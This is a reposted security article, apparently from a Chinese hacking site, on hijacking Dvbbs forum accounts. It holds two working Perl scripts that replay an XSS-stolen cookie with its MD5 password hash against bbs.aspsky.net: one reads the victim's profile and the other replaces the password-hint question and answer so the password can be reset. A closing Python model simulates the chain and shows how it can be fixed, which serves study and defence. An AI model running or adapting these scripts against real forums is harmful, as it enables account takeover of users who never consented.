
Getting around the password hashing in the 动网先锋 (Dvbbs) ASP forum

A security analysis of the 动网先锋 ASP forum: cross-site scripting. In the 动网 forum the password and the answer to the password-hint question are stored and sent as MD5 hashes, so a cookie stolen through XSS does not hand you the password itself. It is still enough, because the server accepts the hash in the cookie as proof of identity: any request that only compares hashes can be made with the stolen value alone. So we take a different route. With the cookie in hand, send one request to fetch the user's profile, then send a second request that changes the user's hint question and answer; once the answer is ours, the password can be changed as well.

Disclaimer:
The two scripts below are for reference only. Do not use them for illegal purposes; you alone bear the consequences if you do.
hiallone is an account I registered on the 动网 forum for testing; you can look at the demo results here:

http://enter.3322.net/cgi-bin/dongw.cgi
http://enter.3322.net/cgi-bin/dongw1.cgi

#!/usr/bin/perl
# Step 1: fetch the user's profile page using the stolen cookie
# http://enter.3322.net/cgi-bin/dongw.cgi
use strict;
use warnings;
use Socket;

my $host = "bbs.aspsky.net";
my $port = 80;
# The stolen cookie. Its password field is the 16-character MD5 of the victim's
# password; the server checks that hash, not the plaintext, so it is all we need.
my $cookie = "aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&upNum=1;";
my $str = "";
my $len = length($str);
my $req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Accept: */*\r\n".
          "Cookie: $cookie\r\n".
          "Content-Type: application/x-www-form-urlencoded\r\n".
          "Content-Length: $len\r\n".
          "Connection: close\r\n\r\n".   # close: <S> below reads until the server hangs up
          "$str";
my @re = sendraw($req);
print "Content-type: text/html\n\n";
print "@re";

# Open a plain TCP connection, write the raw request, return the response lines.
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, sockaddr_in($port, $target))) {
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}

------------------------------------------------

#!/usr/bin/perl
# Step 2: change the hint question and answer. Here we set quesion=whoami21&answer=superdao;
# after that you can go and change his password, heh!
# http://enter.3322.net/cgi-bin/dongw1.cgi
use strict;
use warnings;
use Socket;

my $host = "bbs.aspsky.net";
my $port = 80;
# psw is the hash from the cookie and oldanswer the hash of the current answer as
# returned by the profile page in step 1. The server compares both as hashes, so no
# plaintext is needed. Single quotes stop Perl interpolating '@' in the e-mail address.
my $str = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao'.
          '&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday='.
          '&face=Pic%2FImage1.gif&myface=Pic%2FImage1.gif&width=22&height=22&URL='.
          '&groupname=%CE%DE%C3%C5%CE%DE%C5%C9&OICQ=&ICQ=&msn=&showRe=1&Signature='.
          '&usercookies=0&Submit=%B8%FC+%D0%C2';
my $len = length($str);
my $cookie = "aspsky=upNum=1&password=965eb72c92a549dd&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=hiallone&usercookies=0";

# No Accept-Encoding header: the response body is printed raw, so it must not be compressed.
my $req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Accept-Language: zh-cn\r\n".
          "Content-Type: application/x-www-form-urlencoded\r\n".
          "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n".
          "Cookie: $cookie\r\n".
          "Content-Length: $len\r\n".
          "Connection: close\r\n\r\n".   # close, not Keep-Alive: <S> below reads until EOF
          "$str";

my @re = sendraw($req);
print "Content-type: text/html\n\n";
print "@re";

# Open a plain TCP connection, write the raw request, return the response lines.
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, sockaddr_in($port, $target))) {
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
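The chain the two scripts carry out, as an added Python model that is not part of the original article and not Dvbbs' own code. It keeps only the behaviour the article depends on: the aspsky cookie carries a 16-character MD5 of the password and the server treats a matching hash as proof of identity; the profile page (step 1) echoes the current psw and oldanswer hashes, which the second request copies back; and once the answer is replaced the password can be reset. Assumptions not on the page: that the profile page returns the hashes as hidden form inputs (the second script's psw and oldanswer fields suggest this but do not prove it), that the 16-character hash is the middle of the MD5 digest, the shape of the lost-password flow, the names Forum, takeover and demo, and the constructed victim account. The hardened=True switch shows the one check that breaks the chain: demanding the plaintext current answer instead of accepting its hash.

```python
"""Model of the cookie-to-account-takeover chain described above. Constructed
example, not Dvbbs' own code; only the behaviour the article relies on is kept."""
import hashlib
import re
from urllib.parse import parse_qs, urlencode


def md5_16(s):
    """16-hex-char MD5 (middle of the digest), the length of the page's cookie
    hash. How Dvbbs really derives its 16-character hash is an assumption here."""
    return hashlib.md5(s.encode()).hexdigest()[8:24]


def parse_form(body):
    """'a=1&b=2' (cookie payload or POST body) -> dict of first values."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def extract_hidden_fields(html):
    """Collect name/value of every <input type=hidden> on the profile form."""
    fields = {}
    for tag in re.findall(r"<input[^>]+>", html, re.I):
        if re.search(r'type="?hidden"?', tag, re.I):
            name = re.search(r'name="?([^"\s>]+)', tag, re.I)
            value = re.search(r'value="?([^"\s>]*)', tag, re.I)
            if name:
                fields[name.group(1)] = value.group(1) if value else ""
    return fields


class Forum:
    """The aspsky cookie carries md5(password) and that hash alone authenticates.
    hardened=True: the old answer must be sent in plaintext, so the hash echoed
    by the profile page is useless to whoever only holds the cookie."""

    def __init__(self, hardened=False):
        self.users, self.hardened = {}, hardened

    def register(self, user, password, question, answer):
        self.users[user] = {"psw": md5_16(password), "quesion": question,
                            "answer": md5_16(answer)}

    def authenticate(self, cookie):
        # Accepts whoever presents the stored hash: the cookie is the password.
        name, _, value = cookie.partition("=")
        c = parse_form(value) if name == "aspsky" else {}
        u = self.users.get(c.get("username"))
        return c["username"] if u and u["psw"] == c.get("password") else None

    def mymodify_get(self, cookie):
        """Step 1 of the article: the profile form echoes the current hashes."""
        user = self.authenticate(cookie)
        if not user:
            return None
        u = self.users[user]
        return (f'<form action="mymodify.asp?action=updat&username={user}">'
                f'<input type="hidden" name="psw" value="{u["psw"]}">'
                f'<input type="hidden" name="oldanswer" value="{u["answer"]}">'
                f'<input type="text" name="quesion" value="{u["quesion"]}"></form>')

    def mymodify_post(self, cookie, body):
        """Step 2: replace the hint question and answer."""
        user = self.authenticate(cookie)
        if not user:
            return 403
        form, u = parse_form(body), self.users[user]
        old = form.get("oldanswer", "")
        if self.hardened:
            old = md5_16(old)  # plaintext required, so a copied hash fails here
        if form.get("psw") != u["psw"] or old != u["answer"]:
            return 400
        u["quesion"], u["answer"] = form["quesion"], md5_16(form["answer"])
        return 200

    def reset_password(self, user, answer, new_password):
        """Step 3: the lost-password flow trusts whatever answer is now stored."""
        u = self.users[user]
        if md5_16(answer) != u["answer"]:
            return False
        u["psw"] = md5_16(new_password)
        return True


def takeover(forum, stolen_cookie, victim):
    """Replay the article's two requests with the stolen cookie, then reset."""
    html = forum.mymodify_get(stolen_cookie)
    if html is None:
        return False
    body = urlencode({**extract_hidden_fields(html), "quesion": "whoami21",
                      "answer": "superdao", "Submit": "Update"})
    if forum.mymodify_post(stolen_cookie, body) != 200:
        return False
    return forum.reset_password(victim, "superdao", "attacker-pw")


def demo(hardened=False):
    """Constructed victim; the cookie is what an XSS payload would exfiltrate."""
    forum = Forum(hardened)
    forum.register("hiallone", "s3cret", "first pet", "rex")
    stolen = f"aspsky=password={forum.users['hiallone']['psw']}&usercookies=0&username=hiallone&upNum=1"
    return takeover(forum, stolen, "hiallone")
```

demo() returns True: the stolen cookie alone ends in a password reset. demo(hardened=True) returns False, because the oldanswer hash copied from the profile page no longer verifies. The fuller fix is for the cookie to carry an opaque random session id, marked HttpOnly, rather than the password hash, so that a stolen cookie is never a reusable credential in the first place.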

Article reposted from: http://www.cnpaf.net/Class/hack/05121820345286175904.htm
